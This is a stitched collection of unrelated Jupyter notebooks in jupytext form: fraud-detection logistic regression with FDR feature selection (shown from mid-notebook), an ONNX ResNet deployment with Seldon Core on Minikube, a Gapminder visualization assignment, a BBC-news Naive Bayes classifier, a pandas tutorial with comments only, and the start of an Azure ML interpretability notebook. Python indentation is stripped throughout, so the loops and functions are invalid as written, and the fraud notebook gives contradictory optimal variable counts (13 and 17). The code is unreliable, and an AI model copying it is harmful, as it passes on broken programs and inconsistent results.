# + [markdown] nbpresent={"id": "183c6087-bab7-495b-991e-5f26dbc87272"}
# ### Trial on Logistic Regression With All the Features
# + nbpresent={"id": "6a5dc069-a3a0-47f0-8c1e-8ab2fcaa2fb8"}
clf = LogisticRegression()
# train the classifier and fit the model
clf.fit(train_fea, train_lab)
# model evaluation: the mean accuracy on the given test data and labels
accuracy = clf.score(train_fea, train_lab)
print("accuracy:", accuracy)
# -
# # Feature Selection based on Accuracy
# +
accuracy = []
for i in range(1,train_fea.shape[1]):
features_sub = train_fea.iloc[:,:i]
clf = LogisticRegression()
clf.fit(features_sub, train_lab)
score = clf.score(features_sub, train_lab)
accuracy.append(score)
print(i, score)
print("")
print(len(accuracy))
print(max(accuracy))
# -
plt.plot(accuracy)
plt.title('Accuracy on training data')
plt.ylabel('Accuracy')
# +
accuracy = []
for i in range(1,train_fea.shape[1]):
features_sub = train_fea.iloc[:,:i]
features_sub_test = test_fea.iloc[:,:i]
clf = LogisticRegression()
clf.fit(features_sub, train_lab)
score = clf.score(features_sub_test, test_lab)
accuracy.append(score)
print(i, score)
print("")
print(len(accuracy))
print(max(accuracy))
# -
plt.plot(accuracy)
plt.title('Accuracy on testing data')
plt.ylabel('Accuracy')
# +
accuracy = []
for i in range(1,train_fea.shape[1]):
features_sub = train_fea.iloc[:,:i]
features_sub_oot = oot_fea.iloc[:,:i]
clf = LogisticRegression()
clf.fit(features_sub, train_lab)
score = clf.score(features_sub_oot, oot_lab)
accuracy.append(score)
print(i, score)
print("")
print(len(accuracy))
print(max(accuracy))
# -
plt.plot(accuracy)
plt.title('Accuracy on oot data')
plt.ylabel('Accuracy')
# # Feature Selection based on ROC_AUC
# +
accuracy = []
for i in range(1,train_fea.shape[1]):
features_sub = train_fea.iloc[:,:i]
clf = LogisticRegression()
clf.fit(features_sub, train_lab)
predictions = clf.predict(features_sub)
score = roc_auc_score(train_lab, predictions)
accuracy.append(score)
print(i, score)
print("")
print(len(accuracy))
print(max(accuracy))
# -
plt.plot(accuracy)
plt.title('ROC_AUC_Score on training data')
plt.ylabel('ROC_AUC_Score')
# +
accuracy = []
for i in range(1,train_fea.shape[1]):
features_sub = train_fea.iloc[:,:i]
features_sub_test = test_fea.iloc[:,:i]
clf = LogisticRegression()
clf.fit(features_sub, train_lab)
predictions = clf.predict(features_sub_test)
score = roc_auc_score(test_lab, predictions)
accuracy.append(score)
print(i, score)
print("")
print(len(accuracy))
print(max(accuracy))
# -
plt.plot(accuracy)
plt.title('ROC_AUC_Score on testing data')
plt.ylabel('ROC_AUC_Score')
# +
accuracy = []
for i in range(1,train_fea.shape[1]):
features_sub = train_fea.iloc[:,:i]
features_sub_oot = oot_fea.iloc[:,:i]
clf = LogisticRegression()
clf.fit(features_sub, train_lab)
predictions = clf.predict(features_sub_oot)
score = roc_auc_score(oot_lab, predictions)
accuracy.append(score)
print(i, score)
print("")
print(len(accuracy))
print(max(accuracy))
# -
plt.plot(accuracy)
plt.title('ROC_AUC_Score on oot data')
plt.ylabel('ROC_AUC_Score')
# # Feature Selection based on FDR
def multipltrun(a=10,v=17):
'''
This function run model on different samples based on user input:
"a" (int) how many randome samples, default as 5
"v" (int) how many variables, default as 6 (most important ones from backward selection)
users can modify model based on different machine learning algorithm and its parameters
FDR is calculated by first sorting outcome in descending order and cut off at 3%,
sum number of fraud records on top 3% and divided by total fraud racords for that sample
Final output would be a dataframe contains FDR at 3% for training set, testing set, and oot.
'''
#declare dict
FDRdict={"train":[],"test":[],"oot":[]}
for i in range(a):
#split training and testing
train, test = train_test_split(trte_df, test_size=0.2,random_state=i)
# split lables and features and t
train_lab = train["fraud_label"]
train_fea = train.iloc[:,1:v+1]
test_lab = test["fraud_label"]
test_fea = test.iloc[:,1:v+1]
oot_lab=oot_df["fraud_label"]
oot_fea=oot_df.iloc[:,1:v+1]
#define and fit model
clf = LogisticRegression()
clf.fit(train_fea, train_lab)
#calculate FDR
for sets in ["train","test","oot"]:
fea=vars()[sets+'_fea']
lab=vars()[sets+'_lab']
prob=pd.DataFrame(clf.predict_proba(fea)) #modify based on your model
result=pd.concat([pd.DataFrame(lab).reset_index(),prob],axis=1)
topRows=int(round(len(result)*0.03))
top3per=result.sort_values(by=1,ascending=False).head(topRows)
FDR=sum(top3per.loc[:,'fraud_label'])/sum(result.loc[:,'fraud_label'])
FDRdict[sets].append(FDR)
#convert into dataframe
FDR_df=pd.DataFrame(FDRdict)
#add new row to calculate mean
FDR_df.loc['mean']=FDR_df.mean()
return FDR_df
multipltrun()
multipltrun(v=16)
def multipltrun_2(a=10,v=17):
'''
This function run model on different samples based on user input:
"a" (int) how many randome samples, default as 5
"v" (int) how many variables, default as 6 (most important ones from backward selection)
users can modify model based on different machine learning algorithm and its parameters
FDR is calculated by first sorting outcome in descending order and cut off at 3%,
sum number of fraud records on top 3% and divided by total fraud racords for that sample
Final output would be a dataframe contains FDR at 3% for training set, testing set, and oot.
'''
#declare dict
FDRdf_v=pd.DataFrame({"train":[],"test":[],"oot":[]})
for j in range(1,v+1):
FDRdict={"train":[],"test":[],"oot":[]}
for i in range(a):
#split training and testing
train, test = train_test_split(trte_df, test_size=0.2,random_state=i)
# split lables and features and t
train_lab = train["fraud_label"]
train_fea = train.iloc[:,1:j+1]
test_lab = test["fraud_label"]
test_fea = test.iloc[:,1:j+1]
oot_lab=oot_df["fraud_label"]
oot_fea=oot_df.iloc[:,1:j+1]
#define and fit model
clf = LogisticRegression()
clf.fit(train_fea, train_lab)
#calculate FDR
for sets in ["train","test","oot"]:
fea=vars()[sets+'_fea']
lab=vars()[sets+'_lab']
prob=pd.DataFrame(clf.predict_proba(fea))
result=pd.concat([pd.DataFrame(lab).reset_index(),prob],axis=1)
topRows=int(round(len(result)*0.03))
top3per=result.sort_values(by=1,ascending=False).head(topRows)
FDR=sum(top3per.loc[:,'fraud_label'])/sum(result.loc[:,'fraud_label'])
FDRdict[sets].append(FDR)
#convert into dataframe
FDR_df=pd.DataFrame(FDRdict)
#add new row to calculate mean
# FDRdf_v.append(FDR_df.mean(),ignore_index=True)
FDRdf_v.loc[j+1]=FDR_df.mean()
return FDRdf_v
multipltrun_2()
multipltrun_2(v = 16)
multipltrun_df = multipltrun_2()
# ## According to the chart above, the optimal FDR for oot data is 0.375419, corresponding to 13 variables.
multipltrun_df.head()
multipltrun_df = multipltrun_df.reset_index()
plt.plot(multipltrun_df['oot'])
plt.title('FDR on oot data')
plt.ylabel('FDR')
# Conclusion: optimal # of variables is 17, the corresponding FDR is 0.504955.
| Fraud/logistic_regression.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # ONNX ResNet Model
#
# This example will show inference over an exported [ONNX](https://github.com/onnx/onnx) ResNet model using Seldon Core. We will use the Seldon S2I wrapper for Intel's NGraph. The example follows this [NGraph tutorial](https://ai.intel.com/adaptable-deep-learning-solutions-with-ngraph-compiler-and-onnx/).
#
# Prerequisites:
# * ```pip install seldon-core```
# * To test locally [ngraph installed](https://github.com/NervanaSystems/ngraph-onnx)
# * protoc > 3.4.0
#
# To run all of the notebook successfully you will need to start it with
# ```
# jupyter notebook --NotebookApp.iopub_data_rate_limit=100000000
# ```
# Download ResNet model fron ONNX Zoo.
# !wget https://s3.amazonaws.com/download.onnx/models/opset_8/resnet50.tar.gz
# !tar -xzvf resnet50.tar.gz
# !rm resnet50.tar.gz
# %matplotlib inline
from keras.applications.imagenet_utils import decode_predictions
from keras.applications.resnet50 import preprocess_input
from keras.preprocessing import image
import ngraph as ng
import numpy as np
import matplotlib.pyplot as plt
# ## Test Model
# Load ONNX model into ngraph.
# +
from ngraph_onnx.onnx_importer.importer import import_onnx_file
# Import the ONNX file
models = import_onnx_file('resnet50/model.onnx')
# Create an nGraph runtime environment
runtime = ng.runtime(backend_name='CPU')
# Select the first model and compile it to a callable function
model = models[0]
resnet = runtime.computation(model['output'], *model['inputs'])
# -
# Test on an image of a Zebra.
img = image.load_img('zebra.jpg', target_size=(224, 224))
img = image.img_to_array(img)
plt.imshow(img / 255.)
x = np.expand_dims(img.copy(), axis=0)
x = preprocess_input(x,mode='torch')
x = x.transpose(0,3,1,2)
preds = resnet(x)
decode_predictions(preds[0], top=5)
# ## Package Model Using S2I
# !s2i build . seldonio/seldon-core-s2i-python3-ngraph-onnx:0.3 onnx-resnet:0.1
# !docker run --name "onnx_resnet_predictor" -d --rm -p 5000:5000 onnx-resnet:0.1
# !seldon-core-tester contract.json 0.0.0.0 5000 -p
# !docker rm onnx_resnet_predictor --force
# ## Test using Minikube
#
# **Due to a [minikube/s2i issue](https://github.com/SeldonIO/seldon-core/issues/253) you will need [s2i >= 1.1.13](https://github.com/openshift/source-to-image/releases/tag/v1.1.13)**
# !minikube start --memory 4096
# !kubectl create clusterrolebinding kube-system-cluster-admin --clusterrole=cluster-admin --serviceaccount=kube-system:default
# !helm init
# !kubectl rollout status deploy/tiller-deploy -n kube-system
# !helm install ../../../helm-charts/seldon-core-operator --name seldon-core --set usageMetrics.enabled=true --namespace seldon-system
# !kubectl rollout status deploy/seldon-controller-manager -n seldon-system
# ## Setup Ingress
# Please note: There are reported gRPC issues with ambassador (see https://github.com/SeldonIO/seldon-core/issues/473).
# !helm install stable/ambassador --name ambassador --set crds.keep=false
# !kubectl rollout status deployment.apps/ambassador
# !eval $(minikube docker-env) && s2i build . seldonio/seldon-core-s2i-python3-ngraph-onnx:0.3 onnx-resnet:0.1
# !kubectl create -f onnx_resnet_deployment.json
# !kubectl rollout status deploy/onnx-resnet-deployment-onnx-resnet-predictor-21cdd95
# !seldon-core-api-tester contract.json `minikube ip` `kubectl get svc ambassador -o jsonpath='{.spec.ports[0].nodePort}'` \
# seldon-deployment-example --namespace seldon -p
# !minikube delete
| examples/models/onnx_resnet50/onnx_resnet50.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# + [markdown] id="view-in-github" colab_type="text"
# <a href="https://colab.research.google.com/github/sanjaykmenon/DS-Unit-1-Sprint-2-Data-Wrangling-and-Storytelling/blob/master/module4-sequence-your-narrative/Sanjay_Krishna__LS_DS_124_Sequence_your_narrative_Assignment.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# + [markdown] colab_type="text" id="JbDHnhet8CWy"
# _Lambda School Data Science_
#
# # Sequence Your Narrative - Assignment
#
# Today we will create a sequence of visualizations inspired by [<NAME>'s 200 Countries, 200 Years, 4 Minutes](https://www.youtube.com/watch?v=jbkSRLYSojo).
#
# Using this [data from Gapminder](https://github.com/open-numbers/ddf--gapminder--systema_globalis/):
# - [Income Per Person (GDP Per Capital, Inflation Adjusted) by Geo & Time](https://raw.githubusercontent.com/open-numbers/ddf--gapminder--systema_globalis/master/ddf--datapoints--income_per_person_gdppercapita_ppp_inflation_adjusted--by--geo--time.csv)
# - [Life Expectancy (in Years) by Geo & Time](https://raw.githubusercontent.com/open-numbers/ddf--gapminder--systema_globalis/master/ddf--datapoints--life_expectancy_years--by--geo--time.csv)
# - [Population Totals, by Geo & Time](https://raw.githubusercontent.com/open-numbers/ddf--gapminder--systema_globalis/master/ddf--datapoints--population_total--by--geo--time.csv)
# - [Entities](https://raw.githubusercontent.com/open-numbers/ddf--gapminder--systema_globalis/master/ddf--entities--geo--country.csv)
# - [Concepts](https://raw.githubusercontent.com/open-numbers/ddf--gapminder--systema_globalis/master/ddf--concepts.csv)
# + [markdown] colab_type="text" id="zyPYtsY6HtIK"
# Objectives
# - sequence multiple visualizations
# - combine qualitative anecdotes with quantitative aggregates
#
# Links
# - [<NAME>’s TED talks](https://www.ted.com/speakers/hans_rosling)
# - [Spiralling global temperatures from 1850-2016](https://twitter.com/ed_hawkins/status/729753441459945474)
# - "[The Pudding](https://pudding.cool/) explains ideas debated in culture with visual essays."
# - [A Data Point Walks Into a Bar](https://lisacharlotterost.github.io/2016/12/27/datapoint-in-bar/): a thoughtful blog post about emotion and empathy in data storytelling
# + [markdown] colab_type="text" id="_R1bj8aXzyVA"
# # ASSIGNMENT
#
#
# 1. Replicate the Lesson Code
# 2. Take it further by using the same gapminder dataset to create a sequence of visualizations that combined tell a story of your choosing.
#
# Get creative! Use text annotations to call out specific countries, maybe: change how the points are colored, change the opacity of the points, change their sized, pick a specific time window. Maybe only work with a subset of countries, change fonts, change background colors, etc. make it your own!
# + id="gBE_yQRk3pYZ" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 35} outputId="d72372cb-e850-4ff2-edb4-f2be38e6709c"
# TODO
import seaborn as sns
sns.__version__
# + id="e6ST4ZkUYq4S" colab_type="code" colab={}
# %matplotlib inline
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
# + id="BdJyuD2xZfYv" colab_type="code" colab={}
income = pd.read_csv('https://raw.githubusercontent.com/open-numbers/ddf--gapminder--systema_globalis/master/ddf--datapoints--income_per_person_gdppercapita_ppp_inflation_adjusted--by--geo--time.csv')
# + id="bG31FDxgZrux" colab_type="code" colab={}
lifespan = pd.read_csv('https://raw.githubusercontent.com/open-numbers/ddf--gapminder--systema_globalis/master/ddf--datapoints--life_expectancy_years--by--geo--time.csv')
# + id="uejVk8CaZuRp" colab_type="code" colab={}
population = pd.read_csv('https://raw.githubusercontent.com/open-numbers/ddf--gapminder--systema_globalis/master/ddf--datapoints--population_total--by--geo--time.csv')
# + id="-4WtudsMZwUe" colab_type="code" colab={}
entities = pd.read_csv('https://raw.githubusercontent.com/open-numbers/ddf--gapminder--systema_globalis/master/ddf--entities--geo--country.csv')
# + id="7KWNKTnYZyju" colab_type="code" colab={}
concepts = pd.read_csv('https://raw.githubusercontent.com/open-numbers/ddf--gapminder--systema_globalis/master/ddf--concepts.csv')
# + id="vsXGFenXZ4JH" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 35} outputId="701800b8-2aa5-433d-d6b2-d57498b96b36"
income.shape, lifespan.shape, population.shape, entities.shape, concepts.shape
# + id="iqIcn9XaZ9-R" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 206} outputId="185714b4-ce06-4540-e8e8-701e7f1bf5a9"
income.head()
# + id="k18vEoPtaAEB" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 363} outputId="8ea318df-e51c-40b8-835e-647c5d0ce9c9"
income.sample(10)
# + id="RC_TTSgwaEFA" colab_type="code" colab={}
pd.options.display.max_columns=500
# + id="tDzm2Fg3cGC3" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 261} outputId="d98009b2-328d-48f7-bd17-3517ec1531b0"
entities.head()
# + id="oOmJ06ArcHvo" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 556} outputId="5af032c6-9b45-4353-9bf9-99ac02bc2e07"
concepts.head()
# + id="jfEcaQL_cOoK" colab_type="code" colab={}
# + [markdown] id="PKjJTQXI3qGI" colab_type="text"
# # STRETCH OPTIONS
#
# ## 1. Animate!
#
# - [How to Create Animated Graphs in Python](https://towardsdatascience.com/how-to-create-animated-graphs-in-python-bb619cc2dec1)
# - Try using [Plotly](https://plot.ly/python/animations/)!
# - [The Ultimate Day of Chicago Bikeshare](https://chrisluedtke.github.io/divvy-data.html) (Lambda School Data Science student)
# - [Using Phoebe for animations in Google Colab](https://colab.research.google.com/github/phoebe-project/phoebe2-docs/blob/2.1/tutorials/animations.ipynb)
#
# ## 2. Study for the Sprint Challenge
#
# - Concatenate DataFrames
# - Merge DataFrames
# - Reshape data with `pivot_table()` and `.melt()`
# - Be able to reproduce a FiveThirtyEight graph using Matplotlib or Seaborn.
#
# ## 3. Work on anything related to your portfolio site / Data Storytelling Project
# + id="7lLHHhW0z0vf" colab_type="code" colab={}
# TODO
| module4-sequence-your-narrative/Sanjay_Krishna__LS_DS_124_Sequence_your_narrative_Assignment.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# name: python3
# ---
# + [markdown] id="view-in-github" colab_type="text"
# <a href="https://colab.research.google.com/github/m-triassi/ai-projects-472/blob/main/Project1_task1.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# + [markdown] id="Uo3WIgPEko34"
# ## Task 1
# This Task consists of using the BBC Dataset to teach a Multinomial Naive Bayes classifier to distinguish between different article types. A given article should be classified into 1 of 5 different categories: business,
# entertainment, politics, sport, and tech
#
# + id="q1oTGjoEmzFF"
# Import Dependencies
import numpy as np
import matplotlib.pyplot as plt
import os, os.path
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.model_selection import train_test_split
from sklearn.naive_bayes import MultinomialNB
from sklearn.metrics import confusion_matrix
from sklearn.metrics import classification_report
from sklearn.metrics import accuracy_score
from sklearn.metrics import f1_score
import sklearn.datasets as datasets
from pathlib import Path
# + colab={"base_uri": "https://localhost:8080/"} id="TwiJHjSiuVtU" outputId="2f68dc29-9929-415f-8390-2f59622ef07b"
# Import Dataset
from google.colab import drive
# drive.mount('/content/drive', force_remount=True) # Only for development
# !gdown --id 1hg8v4l7iGcqW83tNwbBRlVaFtfNCn6rr
# !unzip /content/BBC.zip
# + id="aN4JRKbcjpsU" colab={"base_uri": "https://localhost:8080/", "height": 265} outputId="e86816e9-ac97-40c5-fc33-b351d713a368"
# Plot distribution of BBC Dataset
## Set up data + labels
dir = "/content/BBC"
y = np.array([])
curr_label = 1
labels = ["Business", "Entertainment", "Politics", "Sports", "Tech"]
## create probability ditribution by adding a particular label to an array n times
## where n is the the number of files per folder
for name in os.listdir(dir):
if os.path.isdir(os.path.join(dir, name)) and not name.startswith("."):
y = np.append(y, np.repeat(curr_label, len(os.listdir(os.path.join(dir, name)))))
curr_label += 1
## Set up the plot
plt.xticks(np.arange(1, 6), labels)
n, bins, patches = plt.hist(y, bins=5, facecolor='b', alpha=0.75, ec="k")
plt.show()
# + id="-lF4oXm2mww9"
# Load Corpus
corpus = datasets.load_files(dir, encoding='latin1')
y = corpus.target
# + id="hoJH5UNIm5Lz" colab={"base_uri": "https://localhost:8080/"} outputId="90993ca5-9b55-41d1-9d63-c03807f54af3"
# Pre-Process Data set
## vectorize texts into word frequencies for model use
vectorizer = CountVectorizer()
X_text = vectorizer.fit_transform(corpus['data'])
print(X_text.shape, y.shape)
# + id="iZg3xIwQm7tc"
# Split Dataset
X_train, X_test, y_train, y_test = train_test_split(X_text, y, test_size=.20, random_state=None)
# + [markdown] id="5zSqyggyiAWv"
#
#
# ---
#
#
# #Naive Bayes: Try 1
#
#
# ---
#
#
#
# + id="1PNmC9F4m-8G" colab={"base_uri": "https://localhost:8080/"} outputId="c8abcde6-b68a-4f54-e6f4-426f958358b8"
# Train Naive Bayes: Try 1
nb_one = MultinomialNB()
nb_one.fit(X_train, y_train)
# + [markdown] id="t6H2M0Q5gkwA"
# ##(B)
# ###Confusion Matrix
#
# + colab={"base_uri": "https://localhost:8080/"} id="SUlN2I4Deq5_" outputId="84d6bcab-07dc-4f6a-b09f-cd2a80f6d867"
print (nb_one.score(X_test, y_test))
y_pred = nb_one.predict(X_test)
# print(y_test)
# print(y_pred)
print(confusion_matrix(y_test, y_pred))
# + [markdown] id="lXtAxYsYiHoi"
# ## (C)
# ###Precision, Recall, F1-measure
# + colab={"base_uri": "https://localhost:8080/"} id="wsm-lNsiiSdf" outputId="bffeebc2-89d7-4c4b-da11-51f92dafb977"
print(classification_report(y_test, y_pred, target_names=labels))
# + [markdown] id="6BfgTBQIj_FY"
# ## (D)
# + [markdown] id="UiQ2UJmLlIJl"
# ###Accuracy
# + colab={"base_uri": "https://localhost:8080/"} id="5qLIpjivkMF-" outputId="c6196631-9a37-4f06-c10a-2bc858a4213a"
print(accuracy_score(y_test, y_pred))
print(accuracy_score(y_test, y_pred, normalize=False))
# + [markdown] id="q-r35HiflKEi"
# ### Macro average F1
# + colab={"base_uri": "https://localhost:8080/"} id="gt1pVt8ulVzL" outputId="eb4a04ae-3a90-4022-e708-986e9766409e"
f1_score(y_test, y_pred, average = 'macro')
# + [markdown] id="OnjLFjdAlMQm"
# ###Weighted average F1
# + colab={"base_uri": "https://localhost:8080/"} id="-hGxOTk0llXp" outputId="6d8f5ffa-063c-4d8e-bc53-de5075582688"
f1_score(y_test, y_pred, average = 'weighted')
# + [markdown] id="gX-Ih3aYl6DI"
# ##(E)
# ###Prior probability of each class
# + id="mqzqr7itmBLd"
# # nb.Proba()???
# + [markdown] id="NeiexWhRNlje"
# ## (F)
#
# ### Size of Vocabulary
# + colab={"base_uri": "https://localhost:8080/"} id="3m2NX4f7OGVZ" outputId="029139b3-89b4-49eb-e073-0ff1991bdf81"
len(vectorizer.vocabulary_)
# + [markdown] id="We9JVIguS8jI"
# ## (E)
#
# ### Number of Word-tokens in each class
# + colab={"base_uri": "https://localhost:8080/"} id="K3H3wM1qTBjc" outputId="d3f4500c-0b31-419f-9001-9651a3beee42"
class_count = [0, 0, 0, 0, 0]
array_text = X_text.toarray()
for index in range(len(array_text)):
class_count[y[index]-1] += sum(array_text[index])
print(class_count)
# + [markdown] id="wVp2l3BIQZzC"
# ## (H)
#
# ### Number of Word-tokens in corpus
# + colab={"base_uri": "https://localhost:8080/"} id="3h2ynG7YQ7Xv" outputId="c5155469-2b16-444a-9937-94ed150f7234"
sum(map(sum, array_text))
# + [markdown] id="B3CuOUWlYvjH"
# ## (I)
#
# ## Words with Freq of zero in each class
# + id="9PRMfogPY8lZ"
class_non_zero_count = [0, 0, 0, 0, 0]
# ahhh
# + [markdown] id="uvdr_uf8ecom"
# ## (I)
#
# ## Words with Freq of one in entire corpus
# + id="RyZ9qQnhef41"
# + [markdown] id="gJGl9cwLhvUx"
# # Naive Bayes: Try 2
#
# Note: cells displaying model performance will be ommited in all future tries in favor of generating an addition to the text file report.
# + id="YGJqiZvtoAcd" colab={"base_uri": "https://localhost:8080/"} outputId="61e2aa4e-a23c-4061-ff5f-b714d82b87fc"
# Train Naive Bayes: Try 2
nb_two = MultinomialNB()
nb_two.fit(X_train, y_train)
# + [markdown] id="nAqUg0w6h4E-"
# #Naive Bayes: Try 3
# + id="Z1eAYO5moBbz" colab={"base_uri": "https://localhost:8080/"} outputId="e34beb53-4dbd-4420-9aad-881635db74ea"
# Train Naive Bayes: Try 3
nb_three = MultinomialNB(alpha=0.0001)
nb_three.fit(X_train, y_train)
# + [markdown] id="Aap1vgbaTOg_"
# # Naive Bayes: Try 4
# + id="OwsyBRoYoFFQ" colab={"base_uri": "https://localhost:8080/"} outputId="1b55dfe0-037b-4a62-95de-ee0feb554744"
# Train Naive Bayes: Try 4
nb_four = MultinomialNB(alpha=0.9)
nb_four.fit(X_train, y_train)
# + id="Uu47oieGoLv7"
# Generate / Appened to Performance file
# model is the instance of NB, Label is the text that will show at the top of the run
#
def generate_report(model, label, vector, dataset):
"""
Appends to a report file with the statistics of a particular model run.
Parameters
----------
model : object
Instance of the machine learning model, NB, Decision tree, etc
label : string
String that will appear at the top of a particular run in the text file
vector : object
Count vectorizor class, fit on the current corpus
dataset : object
the fit_transform output of the above vectorizor
"""
f = open("bbc_performance.txt", "a")
f.write("\n==========================================================")
f.write("\nAttempt Description: " + label)
f.write("\nConfusion Martix + Score:\n")
f.write(str(model.score(X_test, y_test)))
f.write("\n")
y_pred = model.predict(X_test)
f.write(str(confusion_matrix(y_test, y_pred)))
f.write("\nClassification Report (precision, recall, and F1-measure )\n")
f.write(str(classification_report(y_test, y_pred, target_names=labels)))
f.write("\nAccuracy Score: accuracy, macro-average F1 and weighted-average F1\n")
f.write(str(accuracy_score(y_test, y_pred, normalize=False)))
f.write("\n")
f.write(str(f1_score(y_test, y_pred, average = 'macro')))
f.write("\n")
f.write(str(f1_score(y_test, y_pred, average = 'weighted')))
f.write("\n")
f.write("\nSize of Vocabulary\n")
f.write(str(len(vector.vocabulary_)))
f.write("\nNumber of Word Tokens in each class\n\n")
class_count = [0, 0, 0, 0, 0]
array_text = dataset.toarray()
for index in range(len(X_text.toarray())):
class_count[y[index]-1] += sum(array_text[index])
f.write(str(class_count))
f.write("\n")
f.write("\nNumber of Word Tokens in Entire Corpus\n\n")
f.write(str(sum(map(sum, dataset.toarray()))))
f.close()
generate_report(nb_one, "Multi-nomialNB default values, try 1", vectorizer, X_text)
generate_report(nb_two, "Multi-nomialNB default values, try 2", vectorizer, X_text)
generate_report(nb_three, "Multi-nomialNB with 0.0001 smoothing, try 3", vectorizer, X_text)
generate_report(nb_four, "Multi-nomialNB with 0.9 smoothing, try 4", vectorizer, X_text)
| Project 1/Project1_task1.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Questions
# 1. Find top 5 customers in 2015
# 2. Find top customers in 2014 that did not buy in 2015
# 3. Select details(all columns) for a given set of customers
# 4. Select 2015 transaction amount and number of transcactions for the same customers
# # Pandas DataFrames Basics
#Import Packages
#Import Dataset (Retail_Data_Customers_Summary.csv)
# ## Find top 5 customers in 2015
# **Concepts covered:**
# 1. head()
# 2. sort()
#the Dataframe name "customers" returns first 5 and last 5 rows
# ### head()
#If you use head(), it returns the top 5 rows
# ### sort()
#To find the top 5 customers, we need to sort by tran_amount_2015 in descending order
# ## Find top customers in 2014 that did not buy in 2015
# **Concepts covered: Slicing Dataframe**
# 1. Selecting Single Columns/Multiple Columns
# 2. Sort when data contains NA (na_position argument)
# ### Select Single Column
#To find the top 5 customers, we need to sort by tran_amount_2014 in descending order
#Then look at the tran_amount_2015 colums to identify those who did not buy
#We will store in a new dataframe name
# ### Select Multiple Column
#Then we will select the relevent columns to answer the question
# ### Sort when data contains "NA"
#Then we ### Select Multiple Columnwill select the relevent columns to answer the question
# ## Select details(all columns) for a given set of customers
# **Concepts covered:**
# 1. Indexing Column
# 2. Slicing Dataframe
# 3. Selecting Single Row/Multiple Rows (.loc())
# 4. Making Permanent change to existing dataframe (inplace = True argument)
# **Sample Customers:** (CS4074, CS5057, CS2945, CS4798, CS4424)
# ### Understanding Basics
#Returns as error as this id is not present in any column name
#so we use .loc to slice/select data by rows
#Still gives an error, as it is unable to find this id in a row (but which row?)
# + cell_style="center"
#The default index is 0,1,2,3,4,5 ...
# -
# ### Slicing Rows using (.loc())
# + cell_style="center"
#We can select one row by mentioning the index number
# -
# ### Indexing existing DataFrame
#We need to set index before we could easily select rows (just like setting a primary key in SQL)
#When we see above the index is set. However, when we check its reset to default
# ### Making change permanent (inplace = True)
#If you want to make permanent change to the dataframe, we use the inplace argument
#Now the change is permanent
# **List of Customers:** (CS4074, CS5057, CS2945, CS4798, CS4424)
#Now if look for details of a customer, we will be able to find it
# ### Multiple rows selection .loc
#To get details of 5 customers, we use a list
# ## Select 2015 transaction amount and number of transcactions for the same customers
# 1. Selecting multiple columns and rows using (.loc())
# 2. Erasing index for a DataFrame (reset_index())
# ### Selecting multiple columns and rows using (.loc())
#We can extend .loc to select both rows and columns (begin with list customers from rows then select columns)
# ### Erasing index for a DataFrame (reset_index())
#We can no longer select customers using (.loc())
# # END
# **Pandas Concepts Covered:**
# 1. head()
# 2. sort()
# 3. Set Index
# 4. Slicing/Selecting DataFrames (columns, rows using .loc)
# 5. Argument (inplace = True)
# 6. Resetting index
| Pandas Basics with Retail Customers/Working/3_Data_Frames_Working.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3.6
# language: python
# name: python36
# ---
# Copyright (c) Microsoft Corporation. All rights reserved.
#
# Licensed under the MIT License.
# 
# # Train and explain models locally and deploy model and scoring explainer
#
#
# _**This notebook illustrates how to use the Azure Machine Learning Interpretability SDK to deploy a locally-trained model and its corresponding scoring explainer to Azure Container Instances (ACI) as a web service.**_
#
#
#
#
#
# Problem: IBM employee attrition classification with scikit-learn (train and explain a model locally and use Azure Container Instances (ACI) for deploying your model and its corresponding scoring explainer as a web service.)
#
# ---
#
# ## Table of Contents
#
# 1. [Introduction](#Introduction)
# 1. [Setup](#Setup)
# 1. [Run model explainer locally at training time](#Explain)
# 1. Apply feature transformations
# 1. Train a binary classification model
# 1. Explain the model on raw features
# 1. Generate global explanations
# 1. Generate local explanations
# 1. [Visualize explanations](#Visualize)
# 1. [Deploy model and scoring explainer](#Deploy)
# 1. [Next steps](#Next)
# ## Introduction
#
#
# This notebook showcases how to train and explain a classification model locally, and deploy the trained model and its corresponding explainer to Azure Container Instances (ACI).
# It demonstrates the API calls that you need to make to submit a run for training and explaining a model to AMLCompute, download the compute explanations remotely, and visualizing the global and local explanations via a visualization dashboard that provides an interactive way of discovering patterns in model predictions and downloaded explanations. It also demonstrates how to use Azure Machine Learning MLOps capabilities to deploy your model and its corresponding explainer.
#
# We will showcase one of the tabular data explainers: TabularExplainer (SHAP) and follow these steps:
# 1. Develop a machine learning script in Python which involves the training script and the explanation script.
# 2. Run the script locally.
# 3. Use the interpretability toolkit’s visualization dashboard to visualize predictions and their explanation. If the metrics and explanations don't indicate a desired outcome, loop back to step 1 and iterate on your scripts.
# 5. After a satisfactory run is found, create a scoring explainer and register the persisted model and its corresponding explainer in the model registry.
# 6. Develop a scoring script.
# 7. Create an image and register it in the image registry.
# 8. Deploy the image as a web service in Azure.
#
#
#
# ## Setup
# Make sure you go through the [configuration notebook](../../../../configuration.ipynb) first if you haven't.
# +
# Check core SDK version number
import azureml.core
